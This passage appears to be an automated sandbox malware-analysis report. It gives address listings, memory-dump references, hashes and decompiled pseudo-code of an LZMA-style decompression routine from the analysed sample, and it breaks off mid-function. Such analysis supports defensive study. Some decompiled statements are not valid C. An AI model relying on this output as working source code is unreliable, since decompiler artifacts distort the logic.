                  0x00405ef3
                  0x00405ef6
                  0x00405ef9
                  0x00405efd
                  0x00000000
                  0x00000000
                  0x00405f03
                  0x00405f06
                  0x00405f08
                  0x00405f09
                  0x00405f0c
                  0x00405f0e
                  0x00405f0f
                  0x00405f11
                  0x00405f14
                  0x00405f19
                  0x00405f1e
                  0x00405f27
                  0x00405f3a
                  0x00405f3d
                  0x00405f49
                  0x00405f71
                  0x00405f73
                  0x00405f81
                  0x00405f81
                  0x00405f85
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405f75
                  0x00405f75
                  0x00405f78
                  0x00405f79
                  0x00405f79
                  0x00000000
                  0x00405f75
                  0x00405f4f
                  0x00405f54
                  0x00405f54
                  0x00405f5d
                  0x00405f65
                  0x00405f68
                  0x00000000
                  0x00405f6e
                  0x00405f6e
                  0x00000000
                  0x00405f6e
                  0x00000000
                  0x00405f8b
                  0x00405f8b
                  0x00405f8f
                  0x0040683b
                  0x00000000
                  0x0040683b
                  0x00405f98
                  0x00405fa8
                  0x00405fab
                  0x00405fae
                  0x00405fae
                  0x00405fae
                  0x00405fb1
                  0x00405fb5
                  0x00000000
                  0x00000000
                  0x00405fb7
                  0x00405fbd
                  0x00405fe7
                  0x00405fed
                  0x00405ff4
                  0x00000000
                  0x00405ff4
                  0x00405fc3
                  0x00405fc6
                  0x00405fcb
                  0x00405fcb
                  0x00405fd6
                  0x00405fde
                  0x00405fe1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406026
                  0x0040602c
                  0x0040602f
                  0x0040603c
                  0x00406044
                  0x00000000
                  0x00000000
                  0x00405ffb
                  0x00405ffb
                  0x00405fff
                  0x0040684a
                  0x00000000
                  0x0040684a
                  0x0040600b
                  0x00406016
                  0x00406016
                  0x00406016
                  0x00406019
                  0x0040601c
                  0x0040601f
                  0x00406024
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004066bb
                  0x004066bb
                  0x004066c1
                  0x004066c7
                  0x004066cd
                  0x004066e7
                  0x004066ea
                  0x004066f0
                  0x004066fb
                  0x004066fb
                  0x004066fd
                  0x004066cf
                  0x004066cf
                  0x004066de
                  0x004066e2
                  0x004066e2
                  0x00406707
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406709
                  0x0040670d
                  0x004068bc
                  0x00000000
                  0x004068bc
                  0x00406719
                  0x00406720
                  0x00406728
                  0x0040672b
                  0x0040672e
                  0x0040672e
                  0x00000000
                  0x00000000
                  0x0040604c
                  0x0040604e
                  0x00406051
                  0x004060c2
                  0x004060c5
                  0x004060c8
                  0x004060cf
                  0x004060d9
                  0x00000000
                  0x004060d9
                  0x00406053
                  0x00406057
                  0x0040605a
                  0x0040605c
                  0x0040605f
                  0x00406062
                  0x00406064
                  0x00406067
                  0x00406069
                  0x0040606e
                  0x00406071
                  0x00406074
                  0x00406078
                  0x0040607f
                  0x00406082
                  0x00406089
                  0x0040608d
                  0x00406095
                  0x00406095
                  0x00406095
                  0x0040608f
                  0x0040608f
                  0x0040608f
                  0x00406084
                  0x00406084
                  0x00406084
                  0x00406099
                  0x0040609c
                  0x004060ba
                  0x004060bc
                  0x00000000
                  0x0040609e
                  0x0040609e
                  0x004060a1
                  0x004060a4
                  0x004060a7
                  0x004060a9
                  0x004060a9
                  0x004060a9
                  0x004060ac
                  0x004060af
                  0x004060b1
                  0x004060b2
                  0x004060b5
                  0x00000000
                  0x004060b5
                  0x00000000
                  0x004062eb
                  0x004062ef
                  0x0040630d
                  0x00406310
                  0x00406317
                  0x0040631a
                  0x0040631d
                  0x00406320
                  0x00406323
                  0x00406326
                  0x00406328
                  0x0040632f
                  0x00406330
                  0x00406332
                  0x00406335
                  0x00406338
                  0x0040633b
                  0x0040633b
                  0x00406340
                  0x00000000
                  0x00406340
                  0x004062f1
                  0x004062f4
                  0x004062f7
                  0x00406301
                  0x00000000
                  0x00000000
                  0x00406355
                  0x00406359
                  0x0040637c
                  0x0040637f
                  0x00406382
                  0x0040638c
                  0x0040635b
                  0x0040635b
                  0x0040635e
                  0x00406361
                  0x00406364
                  0x00406371
                  0x00406374
                  0x00406374
                  0x00000000
                  0x00000000
                  0x00406398
                  0x0040639c
                  0x00000000
                  0x00000000
                  0x004063a2
                  0x004063a6
                  0x00000000
                  0x00000000
                  0x004063ac
                  0x004063ae
                  0x004063b2
                  0x004063b2
                  0x004063b5
                  0x004063b9
                  0x00000000
                  0x00000000
                  0x00406409
                  0x0040640d
                  0x00406414
                  0x00406417
                  0x0040641a
                  0x00406424
                  0x00000000
                  0x00406424
                  0x0040640f
                  0x00000000
                  0x00000000
                  0x00406430
                  0x00406434
                  0x0040643b
                  0x0040643e
                  0x00406441
                  0x00406436
                  0x00406436
                  0x00406436
                  0x00406444
                  0x00406447
                  0x0040644a
                  0x0040644a
                  0x0040644d
                  0x00406450
                  0x00406453
                  0x00406453
                  0x00406456
                  0x0040645d
                  0x00406462
                  0x00000000
                  0x00000000
                  0x004064f0
                  0x004064f0
                  0x004064f4
                  0x00406892
                  0x00000000
                  0x00406892
                  0x004064fa
                  0x004064fd
                  0x00406500
                  0x00406504
                  0x00406507
                  0x0040650d
                  0x0040650f
                  0x0040650f
                  0x0040650f
                  0x00406512
                  0x00406515
                  0x00000000
                  0x00000000
                  0x004060e5
                  0x004060e5
                  0x004060e9
                  0x00406856
                  0x00000000
                  0x00406856
                  0x004060ef
                  0x004060f2
                  0x004060f5
                  0x004060f9
                  0x004060fc
                  0x00406102
                  0x00406104
                  0x00406104
                  0x00406104
                  0x00406107
                  0x0040610a
                  0x0040610a
                  0x0040610d
                  0x00406110
                  0x00000000
                  0x00000000
                  0x00406116
                  0x0040611c
                  0x00000000
                  0x00000000
                  0x00406122
                  0x00406122
                  0x00406126
                  0x00406129
                  0x0040612c
                  0x0040612f
                  0x00406132
                  0x00406133
                  0x00406136
                  0x00406138
                  0x0040613e
                  0x00406141
                  0x00406144
                  0x00406147
                  0x0040614a
                  0x0040614d
                  0x00406150
                  0x0040616c
                  0x0040616f
                  0x00406172
                  0x00406175
                  0x0040617c
                  0x00406180
                  0x00406182
                  0x00406186
                  0x00406152
                  0x00406152
                  0x00406156
                  0x0040615e
                  0x00406163
                  0x00406165
                  0x00406167
                  0x00406167
                  0x00406189
                  0x00406190
                  0x00406193
                  0x00000000
                  0x00406199
                  0x00000000
                  0x00406199
                  0x00000000
                  0x0040619e
                  0x0040619e
                  0x004061a2
                  0x00406862
                  0x00000000
                  0x00406862
                  0x004061a8
                  0x004061ab
                  0x004061ae
                  0x004061b2
                  0x004061b5
                  0x004061bb
                  0x004061bd
                  0x004061bd
                  0x004061bd
                  0x004061c0
                  0x004061c3
                  0x004061c3
                  0x004061c3
                  0x004061c9
                  0x00000000
                  0x00000000
                  0x004061cb
                  0x004061ce
                  0x004061d1
                  0x004061d4
                  0x004061d7
                  0x004061da
                  0x004061dd
                  0x004061e0
                  0x004061e3
                  0x004061e6
                  0x004061e9
                  0x00406201
                  0x00406204
                  0x00406207
                  0x0040620a
                  0x0040620a
                  0x0040620d
                  0x00406211
                  0x00406213
                  0x004061eb
                  0x004061eb
                  0x004061f3
                  0x004061f8
                  0x004061fa
                  0x004061fc
                  0x004061fc
                  0x00406216
                  0x0040621d
                  0x00406220
                  0x00000000
                  0x00406222
                  0x00000000
                  0x00406222
                  0x00406220
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00000000
                  0x00000000
                  0x00406262
                  0x00406262
                  0x00406266
                  0x0040686e
                  0x00000000
                  0x0040686e
                  0x0040626c
                  0x0040626f
                  0x00406272
                  0x00406276
                  0x00406279
                  0x0040627f
                  0x00406281
                  0x00406281
                  0x00406281
                  0x00406284
                  0x00406287
                  0x00406287
                  0x0040628d
                  0x0040622b
                  0x0040622b
                  0x0040622e
                  0x00000000
                  0x0040622e
                  0x0040628f
                  0x0040628f
                  0x00406292
                  0x00406295
                  0x00406298
                  0x0040629b
                  0x0040629e
                  0x004062a1
                  0x004062a4
                  0x004062a7
                  0x004062aa
                  0x004062ad
                  0x004062c5
                  0x004062c8
                  0x004062cb
                  0x004062ce
                  0x004062ce
                  0x004062d1
                  0x004062d5
                  0x004062d7
                  0x004062af
                  0x004062af
                  0x004062b7
                  0x004062bc
                  0x004062be
                  0x004062c0
                  0x004062c0
                  0x004062da
                  0x004062e1
                  0x004062e4
                  0x00000000
                  0x004062e6
                  0x00000000
                  0x004062e6
                  0x00000000
                  0x00406573
                  0x00406573
                  0x00406577
                  0x0040689e
                  0x00000000
                  0x0040689e
                  0x0040657d
                  0x00406580
                  0x00406583
                  0x00406587
                  0x0040658a
                  0x00406590
                  0x00406592
                  0x00406592
                  0x00406592
                  0x00406595
                  0x00000000
                  0x00000000
                  0x00406343
                  0x00406343
                  0x00406346
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040673f
                  0x00406743
                  0x00406761
                  0x00406761
                  0x00406761
                  0x00406768
                  0x0040676f
                  0x00000000
                  0x0040676f
                  0x00406745
                  0x00406748
                  0x0040674b
                  0x0040674e
                  0x00406755
                  0x00000000
                  0x00000000
                  0x00406830
                  0x00406833
                  0x00406734
                  0x00406734
                  0x00000000
                  0x00000000
                  0x0040646a
                  0x0040646c
                  0x00406473
                  0x00406474
                  0x00406476
                  0x00406479
                  0x00000000
                  0x00000000
                  0x00406481
                  0x00406484
                  0x00406487
                  0x00406489
                  0x0040648b
                  0x0040648b
                  0x0040648c
                  0x0040648f
                  0x00406496
                  0x00406499
                  0x004064a7
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040678c
                  0x0040678c
                  0x00406790
                  0x004068c8
                  0x00000000
                  0x004068c8
                  0x00406796
                  0x00406799
                  0x0040679c
                  0x004067a0
                  0x004067a3
                  0x004067a9
                  0x004067ab
                  0x004067ab
                  0x004067ab
                  0x004067ae
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x00000000
                  0x00000000
                  0x004064af
                  0x004064b2
                  0x004064e8
                  0x00406618
                  0x00406618
                  0x00406618
                  0x00406618
                  0x0040661b
                  0x0040661b
                  0x0040661e
                  0x00406620
                  0x004068aa
                  0x00000000
                  0x004068aa
                  0x00406626
                  0x00406629
                  0x00000000
                  0x00000000
                  0x0040662f
                  0x00406633
                  0x00406636
                  0x00406636
                  0x00406636
                  0x00000000
                  0x00406636
                  0x004064b4
                  0x004064b6
                  0x004064b8
                  0x004064ba
                  0x004064bd
                  0x004064be
                  0x004064c0
                  0x004064c2
                  0x004064c5
                  0x004064c8
                  0x004064de
                  0x004064e3
                  0x0040651b
                  0x0040651b
                  0x0040651f
                  0x0040654b
                  0x0040654d
                  0x00406554
                  0x00406557
                  0x0040655a
                  0x0040655a
                  0x0040655f
                  0x0040655f
                  0x00406561
                  0x00406564
                  0x0040656b
                  0x0040656e
                  0x0040659b
                  0x0040659b
                  0x0040659e
                  0x004065a1
                  0x00406615
                  0x00406615
                  0x00406615
                  0x00000000
                  0x00406615
                  0x004065a3
                  0x004065a9
                  0x004065ac
                  0x004065af
                  0x004065b2
                  0x004065b5
                  0x004065b8
                  0x004065bb
                  0x004065be
                  0x004065c1
                  0x004065c4
                  0x004065dd
                  0x004065df
                  0x004065e2
                  0x004065e3
                  0x004065e6
                  0x004065e8
                  0x004065eb
                  0x004065ed
                  0x004065ef
                  0x004065f2
                  0x004065f4
                  0x004065f7
                  0x004065fb
                  0x004065fd
                  0x004065fd
                  0x004065fe
                  0x00406601
                  0x00406604
                  0x004065c6
                  0x004065c6
                  0x004065ce
                  0x004065d3
                  0x004065d5
                  0x004065d8
                  0x004065d8
                  0x00406607
                  0x0040660e
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00000000
                  0x00406610
                  0x00000000
                  0x00406610
                  0x0040660e
                  0x00406521
                  0x00406524
                  0x00406526
                  0x00406529
                  0x0040652c
                  0x0040652f
                  0x00406531
                  0x00406534
                  0x00406537
                  0x00406537
                  0x0040653a
                  0x0040653a
                  0x0040653d
                  0x00406544
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00000000
                  0x00406546
                  0x00000000
                  0x00406546
                  0x00406544
                  0x004064ca
                  0x004064cd
                  0x004064cf
                  0x004064d2
                  0x00000000
                  0x00000000
                  0x00406231
                  0x00406231
                  0x00406235
                  0x0040687a
                  0x00000000
                  0x0040687a
                  0x0040623b
                  0x0040623e
                  0x00406241
                  0x00406244
                  0x00406247
                  0x0040624a
                  0x0040624d
                  0x0040624f
                  0x00406252
                  0x00406255
                  0x00406258
                  0x0040625a
                  0x0040625a
                  0x0040625a
                  0x00000000
                  0x00000000
                  0x004063bc
                  0x004063bc
                  0x004063c0
                  0x00406886
                  0x00000000
                  0x00406886
                  0x004063c6
                  0x004063c9
                  0x004063cc
                  0x004063cf
                  0x004063d1
                  0x004063d1
                  0x004063d1
                  0x004063d4
                  0x004063d7
                  0x004063da
                  0x004063dd
                  0x004063e0
                  0x004063e3
                  0x004063e4
                  0x004063e6
                  0x004063e6
                  0x004063e6
                  0x004063e9
                  0x004063ec
                  0x004063ef
                  0x004063f2
                  0x004063f2
                  0x004063f2
                  0x004063f5
                  0x004063f7
                  0x004063f7
                  0x00000000
                  0x00000000
                  0x00406639
                  0x00406639
                  0x00406639
                  0x0040663d
                  0x00000000
                  0x00000000
                  0x00406643
                  0x00406646
                  0x00406649
                  0x0040664c
                  0x0040664e
                  0x0040664e
                  0x0040664e
                  0x00406651
                  0x00406654
                  0x00406657
                  0x0040665a
                  0x0040665d
                  0x00406660
                  0x00406661
                  0x00406663
                  0x00406663
                  0x00406663
                  0x00406666
                  0x00406669
                  0x0040666c
                  0x0040666f
                  0x00406672
                  0x00406676
                  0x00406678
                  0x0040667b
                  0x00000000
                  0x0040667d
                  0x004063fa
                  0x004063fa
                  0x00000000
                  0x004063fa
                  0x0040667b
                  0x004068b0
                  0x004068d2
                  0x004068d8
                  0x004068da
                  0x004068e1
                  0x004068e3
                  0x004068ea
                  0x004068ee
                  0x00000000
                  0x00405edf
                  0x004068e7
                  0x004068e7
                  0x00000000
                  0x004068e7
                  0x00406734
                  0x004067ba
                  0x004067c0
                  0x004067c3
                  0x004067c6
                  0x004067c9
                  0x004067cc
                  0x004067cf
                  0x004067d2
                  0x004067d5
                  0x004067db
                  0x004067f4
                  0x004067f7
                  0x004067fa
                  0x004067fd
                  0x00406801
                  0x00406803
                  0x00406804
                  0x00406807
                  0x004067dd
                  0x004067dd
                  0x004067e5
                  0x004067ea
                  0x004067ec
                  0x004067ef
                  0x004067ef
                  0x00406811
                  0x00000000
                  0x00406813
                  0x00000000
                  0x00406813
                  0x00406811
                  0x00000000
                  0x00406686

                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                  • Instruction ID: bb8ed6064adbc6ac752208bd1780db284a58169b415d1e5229999a4f541ad509
                  • Opcode Fuzzy Hash: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                  • Instruction Fuzzy Hash: 11912271D00229CBDF28CF98C854BADBBB1FB44305F15816AD816BB291C7789A96DF44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00406398 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E00406398() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004068EF))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
